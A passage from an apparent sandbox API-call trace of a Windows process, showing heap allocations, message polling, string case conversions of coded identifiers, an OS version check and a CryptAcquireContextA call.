hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0102.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0102.883] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0102.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0102.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0102.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0102.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0102.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0102.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0102.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0102.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0102.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0102.884] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0102.884] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.884] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0102.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0102.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0102.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0102.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0102.884] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0102.884] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0102.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0102.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0102.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0102.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0102.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0102.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0102.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0102.884] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0102.884] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0102.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0102.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0102.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0102.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0102.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0102.885] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0102.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0102.885] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.885] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.885] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.885] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0102.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0102.885] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.885] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0102.885] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0102.885] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0102.885] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0102.885] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0102.885] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0102.885] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7200, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0102.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0102.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6e80, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0102.886] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bf330) returned 1 [0102.886] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.887] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.887] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0102.887] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.887] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0102.887] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.887] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.956] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 1 [0102.956] TranslateMessage (lpMsg=0x8cf248) returned 0 [0102.956] DispatchMessageW (lpMsg=0x8cf248) returned 0x0 [0102.956] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0102.956] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0102.956] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.957] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.957] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.957] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0102.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0102.957] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0102.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0102.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0102.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96a0 [0102.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0102.957] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0102.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0102.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0102.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0102.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0102.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0102.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0102.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0102.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0102.957] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0102.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0102.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0102.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0102.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0102.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0102.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0102.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0102.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0102.958] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0102.958] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0102.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0102.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0102.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0102.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0102.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0102.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0102.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0102.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0102.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0102.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0102.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0102.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0102.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0102.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0102.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0102.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0102.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0102.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0102.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0102.958] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0102.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0102.958] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0102.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0102.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0102.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0102.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0102.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0102.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0102.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0102.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0102.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0102.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0102.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0102.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0102.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0102.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0102.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0102.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0102.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0102.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0102.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0102.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0102.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0102.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0102.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0102.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0102.959] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0102.959] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0102.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0102.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0102.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0102.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0102.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0102.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0102.959] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0102.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0102.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0102.960] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0102.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0102.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0102.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0102.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71718 [0102.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0102.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0102.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0102.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0102.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0102.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a715e8 [0102.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0102.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0102.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0102.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9700 [0102.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0102.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0102.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0102.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0102.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0102.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0102.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0102.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0102.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0102.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0102.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0102.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0102.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0102.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0102.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c28 [0102.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0102.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9940 [0102.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0102.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0102.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0102.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0102.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0102.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0102.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0102.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0102.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0102.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0102.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0102.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 